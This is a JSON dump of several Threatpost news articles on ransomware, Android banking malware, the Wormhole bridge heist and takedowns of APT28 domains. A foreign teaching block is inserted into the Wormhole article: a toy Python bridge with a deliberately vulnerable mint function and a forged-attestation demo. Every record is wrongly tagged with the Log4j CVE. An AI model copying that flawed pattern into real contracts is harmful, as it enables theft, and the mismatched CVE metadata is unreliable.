evade U.S. sanctions \u201cat any meaningful scale.\u201d\n\n\u201cThe magnitude of the recent sanction reaches into the billions, amounts that are large enough to be unattainable for almost all cryptocurrencies currently,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel. 
\u201cThere may be opportunities at the individual level, but for the scale of nation-state operations and expenditures, a few million or even tens of millions aren\u2019t really going to move the needle.\u201d\n\nLike Smothers, he also noted that the transparency of blockchain technology due to its nature as \u201ca public ledger\u201d makes it easier for financial authorities to observe and trace suspicious cryptocurrency transactions than if sanctioned entities used \u201ctraditional money-laundering means.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:10:04", "type": "threatpost", "title": "Russia May Use Ransomware Payouts to Avoid Sanctions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:10:04", "id": "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "href": "https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). 
\u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. 
\u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. 
They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Wormhole \u2013 a web-based blockchain \u201cbridge\u201d that enables users to convert cryptocurrencies \u2013 said on Thursday that \u201call funds are safe\u201d after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).\n\nIn a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that \u201cthe attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.\u201d\n\nAs far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, \u201cWe noticed you were able to exploit the 
Solana VAA verification and mint tokens. We\u2019d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you\u2019ve minted. You can reach out to us at[ contact@certus.one](<https://t.nylas.com/t1/222/6go6zh11n354zj4gtfyydtk2j/0/7e3f0565dba6ac71abf6ccdb740c5697cd8db828b0852af88c0c054ee28bb3c2>).\u201d\n\nIts total on the heist differs a bit from that of Wormhole: CertiK\u2019s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.\n\nThis is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million. That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.\n\nIn an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.\n\n> 1/2\n> \n> All funds have been restored and Wormhole is back up.\n> \n> We're deeply grateful for your support and thank you for your patience.\n> \n> \u2014 Wormhole\ud83c\udf2a (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079?ref_src=twsrc%5Etfw>)\n\nWormhole\u2019s Portal \u2013 its token bridge \u2013 was back up as of 13:29 UTC, the team said.\n\n## A \u2018Rather Common\u2019 Programming Error\n\nRoger Grimes, data driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a \u201crather common\u201d programming error.\n\n\u201cThe function inside of the 
multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,\u201d he explained via email. \u201cSo there was no integrity guaranteed in the integrity check. Yeah, that is a problem.\u201d\n\n## Why So Popular?\n\nCertiK said that the bridge\u2019s popularity meant that it had become the dominant bridge between Solana and Ethereum, \u201cand as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.\u201d\n\n020322 14:54 UPDATE: Added CertiK\u2019s analysis of Wormhole\u2019s 1:1 ratio of ETH to wETH. \n\nAs CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, \u201cacting essentially as an escrow service.\u201d But the theft broke that 1:1 peg, leaving what CertiK said was \u201cat least 93,750 less ETH held as collateral.\u201d\n\nThat didn\u2019t bode well for the financial health of Solana, the firm pointed out. If the ratio hadn\u2019t been regained, DeFi on Solana was at risk of \u201ca mass liquidation event,\u201d according to its analysis.\n\nBut given that Wormhole on Thursday indicated that its backers \u2013 whoever they may be \u2013 had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored. \n\nAll well and good, but still, investors recoiled from the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. 
Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.\n\nAt this point, the full extent of this attack \u201cstill remains to be seen,\u201d CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole\u2019s bridge to a different cryptocurrency \u2013 the Terra blockchain \u2013 shares the same vulnerability as its Solana bridge.\n\n## Who Bailed Out Wormhole?\n\nThe Wormhole team didn\u2019t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to \u201cmanage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.\u201d\n\n\u201cIt was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),\u201d suggested one Twitter user.\n\n> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)\n> \n> \u2014 ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956?ref_src=twsrc%5Etfw>)\n\nAlameda hasn\u2019t made a public statement on the matter. 
Wormhole has promised a detailed incident report as soon as possible.\n\n## Crypto\u2019s Cutting Edge Gets a Nasty Cut\n\nRonghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn\u2019t the first of its kind, and obviously, it won\u2019t be the last.\n\n\u201cWe saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,\u201d Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/#:~:text=Hackers%20have%20stolen%20%2480%20million,ever%2C%20DeFiYield%20Rekt%20data%20shows.>) by the DeFi protocol Qubit Finance on Friday.\n\nThe attackers reportedly made off with 206,809 Binance coins through Qubit\u2019s QBridge deposit function, making it the seventh-largest DeFi hack ever.\n\nExpect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. \u201cWe seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry\u2019s ability to build services securely,\u201d he told Threatpost via email.\n\nOf course, there\u2019s always the \u201cbecause that\u2019s where the money is\u201d rationale, Gu noted: \u201cBridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.\u201d\n\nThreat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: \u201cA lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.\u201d\n\n## A Need for Secure Development Lifecycle\n\nWhere there is software, there are bugs. 
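Grimes' point above, a verification routine that can be satisfied without the integrity check actually running, in illustrative Python. This is an added example, not Wormhole's code, and it does not reproduce the real exploit, which the article does not detail. Everything below is an assumption for the demonstration: guardian signatures are stood in for by HMAC-SHA256 with a per-guardian secret (so the toy bridge holds the secrets, whereas a real bridge verifies public-key signatures), the more-than-two-thirds quorum, the `VAA`, `Bridge`, `mint_vulnerable` and `mint` names, and the 120,000-unit transfer. The vulnerable path takes a `verified` flag from its caller; the hardened path runs the quorum check itself and refuses replays, and `peg_intact` is the 1:1 collateral invariant CertiK describes, which the forged mint breaks.

```python
"""Toy cross-chain bridge: a mint path that trusts a caller-supplied "verified"
flag beside one that performs and enforces the guardian-signature check itself.
Illustrative code, not Wormhole's. Assumptions (not from the article): guardian
signatures are stood in for by HMAC-SHA256 with a per-guardian secret, so this
toy bridge holds the secrets (a real bridge verifies public-key signatures);
the quorum rule, field names and the sample transfer are made up."""
import hashlib
import hmac
from dataclasses import dataclass

QUORUM_NUM, QUORUM_DEN = 2, 3   # more than 2/3 of the guardian set must sign (assumption)

def vaa_digest(emitter_chain, emitter, sequence, payload):
    """Length-prefixed SHA-256 over the message fields; this is what guardians sign."""
    h = hashlib.sha256()
    for part in (emitter_chain.to_bytes(2, "big"), emitter, sequence.to_bytes(8, "big"), payload):
        h.update(len(part).to_bytes(4, "big"))
        h.update(part)
    return h.digest()

def guardian_sign(secret, digest):
    """Stand-in for one guardian's signature over the digest."""
    return hmac.new(secret, digest, hashlib.sha256).digest()

def encode_transfer(amount, recipient):
    """Transfer payload: 32-byte big-endian amount followed by a 32-byte recipient."""
    return amount.to_bytes(32, "big") + recipient

@dataclass
class VAA:                 # signed attestation that an amount was locked on the source chain
    emitter_chain: int
    emitter: bytes
    sequence: int
    payload: bytes
    signatures: list       # [(guardian_index, signature_bytes), ...]

    def digest(self):
        return vaa_digest(self.emitter_chain, self.emitter, self.sequence, self.payload)

class Bridge:
    def __init__(self, guardian_secrets):
        self.guardians = list(guardian_secrets)   # index -> secret (toy only)
        self.consumed = set()                     # redeemed digests, for replay protection
        self.locked_collateral = 0                # units locked on the source chain
        self.wrapped_supply = 0                   # wrapped units minted here

    def lock(self, amount):                       # simulates the source-chain deposit
        self.locked_collateral += amount

    def verify_vaa(self, vaa):
        """True only if more than 2/3 of distinct, known guardians validly signed the digest."""
        digest, seen, valid = vaa.digest(), set(), 0
        for idx, sig in vaa.signatures:
            if idx in seen or not 0 <= idx < len(self.guardians):
                return False   # duplicate or unknown signer: reject the whole message
            seen.add(idx)
            if not hmac.compare_digest(guardian_sign(self.guardians[idx], digest), sig):
                return False   # one bad signature invalidates the attestation
            valid += 1
        return valid * QUORUM_DEN > QUORUM_NUM * len(self.guardians)

    def mint_vulnerable(self, vaa, verified):
        """Anti-pattern: the integrity check is an input the caller controls."""
        if not verified:
            raise PermissionError("caller reports unverified")
        self.wrapped_supply += int.from_bytes(vaa.payload[:32], "big")

    def mint(self, vaa):
        """Hardened: verification happens here; only a quorum-signed, unredeemed VAA mints."""
        if not self.verify_vaa(vaa):
            raise PermissionError("VAA failed guardian quorum check")
        if vaa.digest() in self.consumed:
            raise PermissionError("VAA already redeemed")
        self.consumed.add(vaa.digest())
        self.wrapped_supply += int.from_bytes(vaa.payload[:32], "big")

    def peg_intact(self):
        """Monitoring invariant: wrapped supply must never exceed locked collateral."""
        return self.wrapped_supply <= self.locked_collateral

def demo():
    """An honest transfer through the hardened path, then one forged VAA against both paths."""
    secrets = [b"guardian-secret-%d" % i for i in range(5)]   # constructed; quorum is 4 of 5
    bridge, amount = Bridge(secrets), 120_000 * 10**18         # 120,000 units, wei-style
    honest = VAA(2, b"\x01" * 32, 1, encode_transfer(amount, b"\x11" * 32), [])
    honest.signatures = [(i, guardian_sign(secrets[i], honest.digest())) for i in range(4)]
    bridge.lock(amount)
    bridge.mint(honest)
    result = {"peg_after_honest": bridge.peg_intact()}
    forged = VAA(2, b"\x01" * 32, 2, encode_transfer(amount, b"\x66" * 32),
                 [(i, b"\x00" * 32) for i in range(4)])        # nothing locked, garbage signatures
    try:
        bridge.mint(forged)
        result["forged_rejected_by_hardened_mint"] = False
    except PermissionError:
        result["forged_rejected_by_hardened_mint"] = True
    result["peg_after_hardened"] = bridge.peg_intact()
    bridge.mint_vulnerable(forged, verified=True)               # the same forgery sails through
    result.update(peg_after_vulnerable=bridge.peg_intact(),
                  wrapped_supply=bridge.wrapped_supply, locked_collateral=bridge.locked_collateral)
    return result
```

`demo()` shows the forged attestation rejected by `mint` with the peg still intact, and then the same forgery minted through `mint_vulnerable`, leaving twice as much wrapped supply as locked collateral. The design point is the one Grimes makes: the check must run inside the privileged operation and its result must be computed there, never accepted as an input the caller can set, and a supply-versus-collateral invariant is a cheap independent alarm for when that fails.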
Grimes pointed to the attack as a case in point for the need for training in secure development lifecycle (SDL) coding. \u201cSDL teaches developers about common exploitable bugs and how to avoid putting them into their own code,\u201d he explained. \u201cIt teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.\u201d\n\nBut there\u2019s a bigger underlying problem, he noted: Most developers and smart-contract creators aren\u2019t trained in SDL and \u201cget little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.\u201d\n\nOne thing to note is that the cryptocurrency world holds trillions of dollars, but it\u2019s still at the toddler stage. \u201cIt is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,\u201d Grimes said.\n\nIt\u2019s getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS because those platforms are maturing, making them tougher to pull apart, he said. That maturity includes experienced coders, tooling and the protective mechanisms of the operating systems themselves.\n\nNot so with the cryptocurrency world, Grimes said, which is the mirror opposite.\n\n\u201cIt is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,\u201d he observed.\n\nHe compared it to leaving your door key in the potted plant in front of the door: \u201cSometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. 
They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And voila, they are finding lots of exploitable bugs.\u201d\n\nAnd once the money\u2019s gone, it\u2019s tough to claw it back. \u201cThe exploits always result in stolen money, which are hard to track and [identify], and almost always impossible to reverse, even if you are watching it in real time,\u201d Grimes said.\n\nHe predicted that after suffering billions of dollars in pain, the cryptocurrency world \u201cwill mature and it will become harder for hackers to find the easy pickings.\u201d\n\nToo bad the lessons are so painful, Grimes said: \u201cYou always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T18:28:14", "type": "threatpost", "title": "Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T18:28:14", "id": "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "href": "https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T17:46:34", "description": "Microsoft seized seven domains it claims were part of ongoing cyberattacks by what it said are state-sponsored Russian advanced persistent threat actors that targeted Ukrainian-related digital assets.\n\nThe company obtained court orders to take control of the domains it said were used by Strontium, also known as APT28, Sofacy, Fancy Bear and Sednit. [In a blog post outlining the actions](<https://blogs.microsoft.com/on-the-issues/2022/04/07/cyberattacks-ukraine-strontium-russia/>), Microsoft reported attackers used the domains to target Ukrainian media organizations, government institutions and foreign policy think tanks based in the U.S. and Europe.\n\n\u201cWe obtained a court order authorizing us to take control of seven internet domains Strontium was using to conduct these attacks,\u201d said Tom Burt, corporate vice president of Customer Security and Trust at Microsoft.\n\nSinkhole is a security term that refers to the redirection of internet traffic from domains, at the domain-server network level, by security researchers for analysis and mitigation. 
Microsoft did not specify exactly how the domains were being abused, beyond identifying those targeted.\n\n\u201cWe have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium\u2019s current use of these domains and enable victim notifications,\u201d Burt said.\n\nResearchers said the APT was attempting to establish persistent, or long-term, access to a target\u2019s system. This, they suggested, would facilitate a second-stage attack that would likely include extraction of sensitive information such as credentials.\n\n\u201cThis disruption is part of ongoing long-term investment, started in 2016, to take legal and technical action to seize infrastructure being used by Strontium. We have established a legal process that enables us to obtain rapid court decisions for this work,\u201d Microsoft said.\n\n## **Sinkhole History**\n\nPrior to this, Microsoft seized 91 malicious domains as part of 15 separate court orders against what it asserts are Russian-language threat groups, [dating back to August 2014](<https://threatpost.com/latest-microsoft-malware-takedown-causes-waves-in-security-community/106939/>).\n\nGoing through the courts to obtain a temporary restraining order against those identified as operating the malicious domains has been Microsoft\u2019s main method for disrupting such campaigns. The court order gives Microsoft the legal authority to take over the domains and reroute their traffic to servers it controls, cutting off the malicious activity.\n\nSinkholes are a time-tested and accepted method for disrupting the operation of botnets and other malware enterprises and are used in a variety of ways. 
Researchers often will work with hosting providers to reroute traffic from malicious domains to ones controlled by the researchers or by law enforcement, helping to cut off the lifeline of the criminal operations and allow for a forensic analysis of traffic used to establish the source, nature and scope of an attack.\n\nIn the case of APT28, [in 2016 the Federal Bureau of Investigation and the US Department of Homeland Security](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) implicated the hacking group in attacks against several U.S. election-related targets.\n\nMore recently, Strontium is believed to have teamed up with Belarusian hacking group Ghostwriter to [launch phishing attacks targeting Ukrainian officials](<https://threatpost.com/eu-russia-ghostwriter-germany/175025/>), according to Google. [European satellite services](<https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/>) have also been targeted by unverified threat actors as part of an escalating cyber offensive designed to hurt Ukraine.\n\n\n\nReported By: Sagar Tiwari, an independent security researcher and technical writer.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-11T17:26:25", "type": "threatpost", "title": "Microsoft Takedown Domains Used in Cyberattack Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-11T17:26:25", "id": "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "href": "https://threatpost.com/microsoft-takedown-domains-ukraine/179257/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T02:13:10", "description": "The San Francisco 49ers were recently kneecapped by a BlackByte ransomware attack that temporarily discombobulated the NFL team\u2019s corporate IT network on the Big Buffalo Wing-Snarfing Day itself: Superbowl Sunday.\n\nBlackByte \u2013 a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who cut it in on a share of ransom profits \u2013 claimed responsibility for the attack by leaking files purportedly stolen in the cyber assault.\n\nThe 49ers confirmed the attack to Threatpost on Monday. The team\u2019s statement:\n\n\u201cWe recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.\u201d\n\nThe 49ers brought in third-party cybersecurity firms to assist and notified law enforcement. The team was still investigating as of Monday, but so far, it looks like the intrusion was limited to its corporate IT network and didn\u2019t affect ticket systems or systems at the team\u2019s home base, Levi\u2019s Stadium..\n\n\u201cTo date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi\u2019s Stadium operations or ticket holders,\u201d its statement said. 
\u201cAs the investigation continues, we are working diligently to restore involved systems as quickly and as safely as possible.\u201d\n\nJoseph Carson, chief security scientist and advisory CISO at privileged access management (PAM) provider Delinea, suggested to Threatpost that it\u2019s likely that an affiliate hacked the 49ers, as opposed to the authors behind the ransomware, given that BlackByte is a RaaS.\n\nBlackByte recently posted some files purportedly stolen from the team on a dark web site in a file marked \u201c2020 Invoices.\u201d The gang hasn\u2019t made its ransom demands public. Nor has the group specified how much data it stole or encrypted.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14200002/blackbyte-49ers-e1644886822236.jpg>)\n\nSource: Ars Technica.\n\nCarson said that the Super Bowl timing makes this one a classic case of cyber pests milking a major event: the kind of situation where they can get unsuspecting victims \u201cto click on links, download and execute malicious software or give over their credentials, thinking they are accessing legitimate internet services, resulting in cybercriminals gaining initial access to networks and services. 
